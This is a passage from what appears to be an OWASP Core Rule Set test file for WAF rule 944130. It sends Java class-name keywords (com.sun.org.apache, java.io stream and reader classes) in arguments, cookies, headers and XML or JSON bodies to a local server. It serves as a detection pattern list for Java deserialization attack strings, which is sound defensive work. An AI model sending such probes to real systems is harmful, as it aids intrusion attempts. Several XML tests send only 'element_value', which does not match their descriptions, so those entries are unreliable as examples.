"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-17 + desc: "XML attribute value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-18 + desc: "XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-19 + desc: "Nested XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-20 + desc: "Content-Type text/plain includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-21 + desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-22 + desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-23 + desc: "Argument test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-24 + desc: "Argument name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-25 + desc: "Cookie test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-26 + desc: "Cookie name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-27 + desc: "Request header test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-28 + desc: "XML attribute value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-29 + desc: "XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-30 + desc: "Nested XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-31 + desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-32 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-33 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-34 + desc: "Argument test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-35 + desc: "Argument name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-36 + desc: "Cookie test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-37 + desc: "Cookie name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-38 + desc: "Request header test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-39 + desc: "XML attribute value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-40 + desc: "XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-41 + desc: "Nested XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-42 + desc: "Content-Type text/plain includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-43 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-44 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-45 + desc: "Argument test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-46 + desc: "Argument name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-47 + desc: "Cookie test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-48 + desc: "Cookie name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-49 + desc: "Request header test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-50 + desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-51 + desc: "XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-52 + desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-53 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-54 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-55 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-56 + desc: "Argument test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-57 + desc: "Argument name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-58 + desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-59 + desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-60 + desc: "Request header test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-61 + desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-62 + desc: "XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-63 + desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-64 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-65 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-66 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-67 + desc: "Argument test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-68 + desc: "Argument name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-69 + desc: "Cookie test includes 